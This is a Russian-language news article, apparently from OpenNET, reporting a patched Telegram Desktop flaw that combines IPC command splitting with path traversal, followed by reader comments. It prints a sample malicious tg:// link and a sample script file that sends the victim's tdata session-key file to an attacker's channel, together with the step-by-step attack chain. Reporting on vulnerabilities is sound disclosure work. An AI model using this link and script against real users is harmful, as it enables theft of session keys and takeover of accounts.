Профиль: Аноним (вход | регистрация) неRU opennet.me  
OpenNET

[ новости /+++ | форум | теги |    ]

Уязвимость в Telegram Desktop, позволяющая отправить произвольные файлы при клике на ссылку

09.10.2026 10:49 (MSK)

Раскрыты подробности и метод эксплуатации уязвимости (CVE-2026-107181) в Telegram Desktop, официальном клиенте Telegram для настольных систем. Проблема вызвана отсутствием должной обработки неэкранированных символов-разделителей в командах IPC, что позволяло при клике на отправленную ссылку организовать передачу атакующему любых файлов с системы жертвы, включая файлы с сессионными ключами, которые можно использовать для захвата учётной записи в Telegram. Уязвимость устранена в выпуске Telegram Desktop 7.2.9.

При клике на ссылках "tg://" операционная система запускает связанное с данным типом ссылок приложение Telegram Desktop. Если в системе уже запущен другой экземпляр данного приложения, то запущенный процесс передаёт ему ссылку через сокет при помощи IPC-интерфейса. Проблема в том, что если указать символ ";" среди параметров ссылки (например, "tg://x?a=1;OPEN..."), содержимое разделяется и идущие после символа ";" части обрабатываются как отдельные команды.

Для совершения атаки задействована команда OPEN вместе с URI-схемой "interpret:", предназначенной для запуска служебных сценариев через IPC, которые использовались для автоматической отправки новых релизов в каналы. Сценарий предоставляет собой предопределённый локальный файл, в котором указан отправляемый в канал файл и идентификатор канала. Файловый путь к сценариям обрабатывается относительно служебного подкаталога, но из-за отсутствия чистки "../" в файловых путях атакующий имеет возможность обратиться к файлам, сохранённым за пределами базового каталога. Например, можно загрузить файл в свою telegram-группу, после чего сослаться на это файл как на сценарий, подготовив ссылку типа:


   tg://x?a=1;OPEN:interpret:../../../Downloads/Telegram%20Desktop/instructions.txt

Этапы проведения атаки:

  • Атакующий добавляет жертву в свою группу (при настройках по умолчанию добавление не требует подтверждения от добавляемого) и отправляет в эту группу текстовый файл, в котором указан канал и путь к сценарию. Telegram сохранит этот файл в предопределённый системный подкаталог при заходе жертвы в группу.
    
       channel: 2005234537
       file: tdata/D877F783D5D3EF8Cs
    
  • Атакующий присылает жертве невинно выглядящую ссылку на свой хост (например, "https://coolsite.org"), которая при открытии через перенаправление на сервере атакующего заменяется на URI вида 'tg://x?a=1;OPEN:interpret:...;OPEN:interpret:...".
  • При клике по ссылке браузер вызывает обработчик URI "tg://", запускающий вышеотмеченную цепочку запуска команд, которая приводит к отправке файлов к канал атакующего без вывода каких-либо уведомлений и без запроса подтверждения отправки.
  • Получив файлы из подкаталога tdata c ключами шифрования и авторизации, при отсутствии выставленного пользователем локального пароля атакующий может клонировать сеанс подключения жертвы на своём устройстве.


  1. Главная ссылка к новости (https://beaksec.github.io/post...)
  2. OpenNews: Неофициальный Telegram-клиент Nekogram отправлял номера телефонов боту разработчика
  3. OpenNews: В Telega, альтернативном клиенте Telegram, выявили возможность совершения MITM-атаки
  4. OpenNews: Мэйнтейнеры Fedora и Gentoo отказались от сопровождения пакетов с Telegram Desktop
  5. OpenNews: GPL-код из Telegram взят мессенджером Mail.ru без соблюдения GPL
  6. OpenNews: Неофициальный Telegram-клиент MobonoGram 2019 оказался троянским ПО
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/66431-telegram
Ключевые слова: telegram
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (17) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 12:00, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/–
    А что СМС-подтверждение из телеги ещё приходит?
     
     
  • 2.16, Аноним (16), 12:52, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    Да, но очень просит купить премиум за 500 форинтов, а то "дорого очень смс слать" (веб версия при этом логинится без каких либо проблем и смс)
     
     
  • 3.20, Аноним (1), 13:12, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    Логинится в существующую учетку, а если новый заводить, смс уже не требует, сомнительно.
    Во многих странах смс это средство идентификации и защиты от ботов.
     

  • 1.2, No Name (?), 12:03, 09/10/2026 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
  • +4 +/–
     

  • 1.3, Аноним (10), 12:03, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/–
    Няшные диаграммы.
     
  • 1.4, Аноним (4), 12:07, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +5 +/–
    ну вроде работает как и задумывали, чо чинить то
     
  • 1.6, Аноним (6), 12:12, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/–
    Открыть Телеграм, увидеть 7.2.9, закрыть Телеграм.
     
  • 1.9, Аноним (10), 12:20, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/–
    Зачем эта спайварь когда есть веб морда?
     
     
  • 2.12, limafresh (ok), 12:41, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/–
    В чём конкретно он "спайварь"? Докажите. И он нужен, потому что Qt даёт нативный опыт и быстродействие, а веб медленный. Для тех, кто редко пользуется, сойдёт, но для остальных нет.
     
     
  • 3.17, Нил Нонэниевич (?), 13:00, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    Без аудита любой кусок софта - потенциальная спайварь.
     
  • 2.14, timur.davletshin (ok), 12:47, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • –1 +/–
    А уэб-морда и является Desktop версией, которая рисуется Electron'ом.
     
     
  • 3.15, limafresh (ok), 12:52, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    Зачем так нагло врать? Telegram Desktop написан на Qt, а не является веб-обёрткой, в отличие от многих.
     

  • 1.11, Аноним (11), 12:39, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/–
    >Уязвимость устранена в выпуске Telegram Desktop 7.2.9

    https://github.com/telegramdesktop/tdesktop/

     
  • 1.18, Метрика (?), 13:06, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/–
    Телега такая телега, а если серьезно анонимный мессенджер с регистрацией по номеру телефона, это сюр...

    Для безопасности нужен мессенджер P2P по типу Gnutella только не для файлов, а для сообщений, но такого конечно не будет, ведь как тогда ваши переписки читать

     
  • 1.21, ИмяХ (ok), 13:16, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/–
    >>отсутствия чистки "../" в файловых путях

    Опять небезопасный язык виноват

     
  • 1.22, Alexey Torgashin 2 (?), 13:16, 09/10/2026 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
  • +/–
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    XSQUARE
    Inferno Solutions
    Hosting by Hoster.ru
    Хоcтинг: